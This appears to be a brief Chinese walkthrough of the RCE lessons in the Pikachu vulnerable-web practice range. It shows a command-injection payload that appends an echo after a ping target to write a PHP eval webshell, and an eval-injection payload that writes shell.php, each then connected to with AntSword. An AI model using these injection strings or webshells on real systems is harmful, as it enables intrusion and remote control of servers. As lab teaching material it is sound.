Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
上海云盾-小余1 小时前
内网边界安全管控:访问权限隔离与入侵阻断方案
网络·安全·web安全
南京码讯光电技术有限公司1 小时前
工业无线AP选型指南:从WiFi 5到WiFi 6+5G CPE,如何构建全覆盖、零漫游、高可靠的智能工厂网络?
服务器·网络·5g
许彰午1 小时前
加密解密加签验签——接口安全的最后一道防线
安全
智慧医养结合软件开源2 小时前
智慧养老系统医生管理模块:专业赋能,筑牢老人诊疗安全防线
大数据·人工智能·安全·生活
二宝哥2 小时前
Linux虚拟机网络配置
linux·运维·服务器
卧室小白2 小时前
docker网络与服务编排与集群
运维·docker·容器
陳10302 小时前
Linux:进程间通信 和 简单进程池
linux·运维·服务器
数字化顾问2 小时前
(122页PPT)数字化架构的演进和治理(附下载方式)
java·运维·架构
jimy12 小时前
改.bashrc,直观地判断本地repo是否有改动
linux·服务器
zt1985q3 小时前
本地部署网页监控工具 Webmonitor 并实现外部访问
运维·服务器·网络·网络协议